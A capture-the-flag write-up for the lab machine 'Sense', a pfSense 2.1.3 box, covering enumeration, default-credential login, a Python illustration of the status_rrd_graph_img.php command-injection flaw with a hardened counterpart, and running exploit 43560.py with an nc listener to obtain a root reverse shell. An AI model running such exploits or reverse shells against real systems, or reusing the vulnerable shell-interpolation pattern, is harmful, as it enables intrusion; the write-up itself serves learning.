Sense

OS: FreeBSD, Difficulty: Easy, IP: 10.10.10.60

Initial Enumeration

# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds

Checking out the page, it turns out to be the login interface of pfSense, and the default credentials admin:pfsense did not work. So I ran gobuster against the URL and found a text file called system-users.txt, which listed the username rohit and said the password was the company default. Trying pfsense as the password for that user got me into the dashboard.

As is evident from the version information on the dashboard, this is pfSense 2.1.3, so I ran the service name and version against searchsploit and found one command injection vulnerability.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
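To show what that searchsploit hit actually is, here is an added example of the bug class, written for this write-up and not taken from pfSense or from 43560.py: a request parameter interpolated into a shell command line, beside a hardened version of the same handler. The parameter name database follows the public write-ups of this issue; the handler bodies, the /var/db/rrd path and the use of echo as a stand-in for the rrdtool binary are assumptions so that the code runs offline.

```python
import re
import subprocess

# Stand-ins so the example runs anywhere without pfSense or rrdtool installed:
# `echo` takes the place of the rrdtool binary and simply prints its arguments.
RRDTOOL = "echo"
RRD_DIR = "/var/db/rrd"

# Constructed sample inputs: a legitimate value for the 'database' parameter
# and one carrying an injected second command after a ';'.
LEGIT_DB = "system-processor.rrd"
INJECTED_DB = "system-processor.rrd; echo INJECTED"


def vulnerable_run(database: str) -> str:
    """Hypothetical unsafe handler (not pfSense's code): the request parameter
    is interpolated into a command string handed to /bin/sh, so a ';' in the
    value ends the rrdtool command and starts an attacker-chosen one."""
    cmd = f"{RRDTOOL} info {RRD_DIR}/{database}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_run(database: str) -> str:
    """Hardened form: allowlist the value (a bare name plus .rrd, so no path
    separators or shell metacharacters), then pass argv directly so no shell
    ever parses it."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.rrd", database):
        raise ValueError(f"rejected database name: {database!r}")
    argv = [RRDTOOL, "info", f"{RRD_DIR}/{database}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def injection_succeeded(output: str) -> bool:
    """True when the marker printed by the injected command appears as its
    own output line, i.e. the second command really ran."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    print(vulnerable_run(LEGIT_DB), end="")
    print(vulnerable_run(INJECTED_DB), end="")   # second line is INJECTED
    print(hardened_run(LEGIT_DB), end="")
    try:
        hardened_run(INJECTED_DB)
    except ValueError as exc:
        print(exc)
```

The real exploit does the same thing with a reverse shell in place of echo INJECTED; because pfSense's web GUI runs as root (see the id output below), whatever gets injected runs as root too.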

User and Root own

So I ran the exploit script with the parameters it required (the dashboard credentials, the target, and my listener's address and port) and got a shell as root. pfSense's web GUI runs as root, so the injected command does too; there is no separate privilege escalation step on this box.

$ python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***

Learning outcome

I need to find better word-lists, ones that are more comprehensive and thorough in terms of research. The ones I used just barely got me through this time.
